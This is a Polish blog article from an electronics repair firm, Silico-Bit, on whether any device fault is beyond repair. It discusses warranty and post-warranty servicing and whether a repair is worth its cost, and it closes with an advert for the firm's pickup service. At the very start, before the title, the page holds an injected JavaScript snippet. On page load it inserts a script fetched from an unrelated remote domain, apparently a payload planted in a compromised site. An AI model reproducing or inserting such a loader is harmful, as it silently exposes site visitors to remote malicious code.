;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Czy istnieje usterka, której nie da się naprawić? | Silico-Bit
Niestety usterki sprzętu elektronicznego zdarzają się w dzisiejszych czasach coraz częściej. Żywotność urządzeń jest uwarunkowana głównie premierami nowych modeli, o czym pisaliśmy już we wcześniejszym artykule. Niestety, prawo rynku jest bezlitosne i często wymieniamy sprzęt na nowy, zamiast zasięgnąć porady fachowca odnośnie naprawy. Czy jednak istnieje taka usterka, której nie da się naprawić w urządzeniu elektronicznym?Czy wszystko można naprawić?

Naprawa w ramach gwarancji

Najczęściej już podczas zakupu sprzętu elektronicznego orientujemy się, jak długo obowiązuje gwarancja na to urządzenie. Wówczas cieszymy się, że możemy być wraz z naszym sprzętem bezpieczni. Niestety często sprawa wygląda tak, iż urządzenie zaczyna się psuć po upływie okresu gwarancji, co może doprowadzać do ogólnej frustracji. Przecież nie po to mamy gwarancję, żeby z niej nie skorzystać, a naprawiać sprzęt na własny koszt tuż po jej upływie. Nie jesteśmy jednak w stanie przewidzieć, kiedy sprzęt zacznie się psuć – w odróżnieniu od producentów, którzy z pewnością szacują żywotność urządzenia, jeszcze przed wprowadzeniem go na rynek.

Nie popadajmy jednak w skrajności i pamiętajmy, że wiele serwisów wykonuje naprawy pogwarancyjne w dobrych cenach, a świadczone usługi są świetnej jakości. Nie ma więc sensu denerwowanie się na sprawy, na które nie mamy wpływu, a jeśli nie będzie kosztowało nas to tak wiele, jak na początku nam się wydaje, warto skorzystać choćby z porady profesjonalisty.

Doświadczony serwis oceni

Jeśli natomiast znajdujesz się jeszcze w okresie gwarancyjnym, a Twój sprzęt zaczyna się psuć, śmiało możesz otrzymać bezpłatną pomoc, pod warunkiem, że dobrze opiszesz usterkę. To bardzo ważne, ponieważ serwis będzie wtedy doskonale wiedział, czy sprzęt po prostu się zepsuł, czy usterka wynika z Twojego niewłaściwego korzystania. Koniec końców w tym przypadku nie musisz się zastanawiać, czy daną usterkę da się „wyleczyć”, ponieważ serwis albo naprawi ją bez ponoszenia przez Ciebie kosztów, albo po prostu wymieni sprzęt na nowy.

Jeśli jednak serwisujesz sprzęt po gwarancji, możesz mieć co do tego obawy. Zgłoś się więc do doświadczonego serwisu sprzętu, który zna się na swojej pracy i oceni rozmiar usterki. Z pewnością nie zrobi nic bez Twojej zgody, ponieważ musisz zatwierdzić najpierw, czy koszty naprawy nie przewyższają Twoich oczekiwań.

Możliwe, ale czy opłacalne?

Czy istnieje zatem usterka której nie da się naprawić? Właściwie, jeśli sprzęt nie uległ całkowitemu spaleniu, raczej nie ma takiej usterki, której serwis nie będzie w stanie naprawić. Oczywiście pod warunkiem, że posiada wszystkie niezbędne do tego narzędzia, części i oczywiście odpowiednią wiedzę. Wszystko jest jednak kwestią kosztów naprawy. Serwis jest w stanie wymienić praktycznie każdy podzespół, a nawet złożyć sprzęt od podstaw, na nowych częściach, jednak pozostaje kwestia tego, czy taka naprawa jest opłacalna.

Naprawa usterki

I tutaj na piedestał wchodzi właśnie uczciwość i doświadczenie serwisu, który jest w stanie fachowo ocenić i podpowiedzieć, czy lepiej naprawić urządzenie, czy lepiej wymienić je na nowe. Może się bowiem okazać, że taka naprawa przyniesie więcej kosztów, niż pożytku i lepiej poszukać całkowicie nowego lub używanego, tudzież sprawnego urządzenia, niż wydawać krocie na drogie części i robociznę. Pamiętaj, że jeśli nie masz w pobliżu żadnego serwisu sprzętu, możesz skorzystać z usług SILICO-BIT. Odbierzemy od Ciebie uszkodzony sprzęt, a jeśli po diagnozie zdecydujesz się go naprawić, wróci on pod Twoje drzwi w zupełnie nowej formie.